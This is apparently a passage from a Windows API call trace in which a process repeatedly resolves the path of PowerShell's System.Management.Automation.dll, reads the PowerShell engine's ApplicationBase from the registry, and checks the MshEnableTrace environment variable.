	[0171.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.190] GetLastError () returned 0xcb
	[0171.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.190] GetLastError () returned 0xcb
	[0171.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.191] GetLastError () returned 0xcb
	[0171.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.191] GetLastError () returned 0xcb
	[0171.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.191] GetLastError () returned 0xcb
	[0171.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.191] GetLastError () returned 0xcb
	[0171.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.191] GetLastError () returned 0xcb
	[0171.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcebbc | out: phkResult=0xcebbc*=0x38c) returned 0x0
	[0171.191] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcec04, lpData=0x0, lpcbData=0xcec00*=0x0 | out: lpType=0xcec04*=0x1, lpData=0x0, lpcbData=0xcec00*=0x56) returned 0x0
	[0171.192] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcec04, lpData=0x337c48, lpcbData=0xcec00*=0x56 | out: lpType=0xcec04*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xcec00*=0x56) returned 0x0
	[0171.192] RegCloseKey (hKey=0x38c) returned 0x0
	[0171.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.192] GetLastError () returned 0xcb
	[0171.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.192] GetLastError () returned 0xcb
	[0171.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.192] GetLastError () returned 0xcb
	[0171.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.193] GetLastError () returned 0xcb
	[0171.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.193] GetLastError () returned 0xcb
	[0171.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.193] GetLastError () returned 0xcb
	[0171.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.228] GetLastError () returned 0xcb
	[0171.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.228] GetLastError () returned 0xcb
	[0171.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.228] GetLastError () returned 0xcb
	[0171.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.228] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.229] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.230] GetLastError () returned 0xcb
	[0171.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.231] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.232] GetLastError () returned 0xcb
	[0171.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.233] GetLastError () returned 0xcb
	[0171.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.233] GetLastError () returned 0xcb
	[0171.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.233] GetLastError () returned 0xcb
